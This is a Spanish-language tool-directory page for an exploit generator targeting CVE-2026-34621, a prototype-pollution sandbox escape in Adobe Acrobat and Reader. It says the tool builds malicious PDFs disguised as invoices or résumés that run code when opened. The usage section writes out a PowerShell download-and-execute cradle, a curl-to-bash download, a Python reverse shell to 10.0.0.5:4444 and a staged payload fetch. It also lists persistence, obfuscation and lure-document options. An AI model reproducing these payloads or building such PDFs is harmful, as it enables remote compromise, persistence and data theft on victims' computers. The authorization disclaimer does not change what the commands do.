Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/null200ok
/
cve_2026_34621_advanced
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

Un generador de exploits sofisticado y multiplataforma para **CVE-2026-34621** – una vulnerabilidad crítica de contaminación de prototipos en Adobe Acrobat y Reader que conduce a la evasión del sandbox y a la ejecución arbitraria de código en Windows y macOS.

Ver Repositorio
13612hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Generador Avanzado de Exploits CVE-2026-34621

Python 3.7+ License

Un generador de exploits sofisticado y multiplataforma para CVE-2026-34621 – una vulnerabilidad crítica de contaminación de prototipos en Adobe Acrobat y Reader que permite el escape del sandbox y la ejecución arbitraria de código en Windows y macOS.

⚠️ AVISO IMPORTANTE
Esta herramienta está destinada únicamente a investigación de seguridad autorizada y pruebas de penetración.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso escrito explícito para probar es ilegal. El autor no asume ninguna responsabilidad por el mal uso.


📋 Tabla de Contenidos

  • Resumen
  • Características
  • Instalación
  • Inicio Rápido
  • Ejemplos de Uso
    • Comandos para Windows
    • Comandos para macOS
    • Pruebas en Móviles
  • Opciones de Línea de Comandos
  • Cómo Funciona
  • Versiones Afectadas
  • Mitigación
  • Contribuciones
  • Licencia

🔍 Resumen

CVE-2026-34621 es una vulnerabilidad de día cero en Adobe Acrobat y Reader que permite a un atacante:

  1. Contaminar el prototipo del objeto JavaScript dentro del motor de Adobe.
  2. Evadir el sandbox de seguridad.
  3. Ejecutar comandos arbitrarios del sistema en la máquina de la víctima.

Este generador crea un archivo PDF malicioso que, al abrirse en una versión vulnerable de Adobe Reader, ejecuta automáticamente un payload adaptado al sistema operativo de la víctima.

Plataformas Destino Soportadas:

  • ✅ Windows (ejecución arbitraria de código completa)
  • ✅ macOS (ejecución arbitraria de código completa)
  • ❌ Android / iOS (no vulnerables – solo respaldo de demostración)

✨ Características

CategoríaCapacidades
Payloads MultiplataformaDetecta automáticamente el SO y selecciona el método de ejecución de comandos apropiado para Windows o macOS.
Múltiples Vectores de Ejecucióncmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
Payloads por EtapasDescarga y ejecuta payloads de segunda etapa desde una URL remota.
PersistenciaInstala clave Run del registro (Windows) o LaunchAgent (macOS).
Técnicas de EvasiónTres niveles de ofuscación de JavaScript, clave de entorno, retrasos de ejecución, código polimórfico.
Incrustación de PDF SeñueloFusiona el exploit en un PDF de apariencia legítima (requiere PyPDF2).
Múltiples DisparadoresOpenAction, acción de apertura de página o JavaScript a nivel de documento.
Informes CompletosInformes HTML, TXT y JSON que detallan la configuración del payload.

📦 Instalación

1. Clonar el Repositorio

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (Opcional) Crear un Entorno Virtual

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. Instalar Dependencias

El script principal utiliza únicamente la biblioteca estándar de Python. Para la función de fusión de PDF señuelo, instala PyPDF2:

pip install PyPDF2

🚀 Inicio Rápido

Genera un PDF básico que abre la calculadora tanto en Windows como en macOS:

python3 cve_2026_34621_advanced.py -o test.pdf

Esto crea:

test.pdf – El archivo PDF malicioso.

test_report.html – Informe HTML detallado.

test_report.txt – Resumen en texto plano.

test_config.json – Exportación de configuración JSON.

💻 Ejemplos de Uso

Comandos para Windows

1-Escenario Comando

A-Ventana emergente básica de calc.exe

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

Reverse shell con PowerShell

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

Payload por etapas con persistencia

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

Clave de entorno (solo se ejecuta en "SALES-PC")

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

Con nivel de ofuscación 2 y retraso de 10 segundos

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

Comandos para macOS

2-Escenario Comando

Abrir Calculadora

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

Descargar y ejecutar script

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Reverse shell mediante Python

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

Persistencia mediante LaunchAgent

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

Incrustación en un PDF Señuelo

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-Nota sobre Pruebas en Móviles

El script en sí se ejecuta en escritorio (Windows/macOS/Linux) para generar el PDF. El PDF generado se puede abrir en dispositivos Android o iOS, pero:

Las versiones móviles de Adobe Acrobat Reader no son vulnerables a CVE-2026-34621.

El payload activará un respaldo de demostración benigno (abre una URL o muestra una alerta) en lugar de ejecutar comandos del sistema.

📖 Opciones de Línea de Comandos

Opción Descripción

-o, --output ARCHIVO Obligatorio. Nombre del archivo PDF de salida.

--win CMD Comando de Windows a ejecutar (por defecto: calc.exe).

--mac CMD Comando de macOS a ejecutar (por defecto: open /System/Applications/Calculator.app).

--stage URL URL para descargar el payload de segunda etapa.

-p, --persistence Instala mecanismo de persistencia (Registro/LaunchAgent).

-O, --obfuscate NIVEL Nivel de ofuscación de JavaScript (0=ninguno, 1=básico, 2=intermedio, 3=avanzado).

-d, --delay SEGUNDOS Retrasa la ejecución los segundos especificados.

-k, --key NOMBRE_HOST Clave de entorno – solo se ejecuta en el nombre de host coincidente.

-l, --lure PDF Ruta a un PDF legítimo para usar como señuelo (fusiona el exploit).

--trigger TIPO Vector de disparo: openaction, pageopen o doclevel.

--no-reports Omite la generación de informes HTML/TXT/JSON.

--seed N Establece la semilla aleatoria para la generación polimórfica reproducible.

⚙️ Cómo Funciona

Cadena de Ataque

Contaminación de Prototipos:

El JavaScript incrustado modifica Object.prototype para inyectar propiedades maliciosas (__trusted, privileged, etc.). Esto confunde el límite de confianza del motor JavaScript de Adobe.

Escalada de Contexto

Debido al prototipo contaminado, el motor trata incorrectamente el JavaScript de documentos no confiables como si se ejecutara en un contexto privilegiado.

Acceso a APIs Privilegiadas

El script ahora puede llamar a APIs restringidas como app.launchURL, util.readFileIntoStream y app.trustedFunction.

Escape del Sandbox

Estas APIs permiten el acceso al sistema de archivos y la ejecución de procesos fuera del sandbox de Adobe.

Ejecución Arbitraria de Código

Descargar herramienta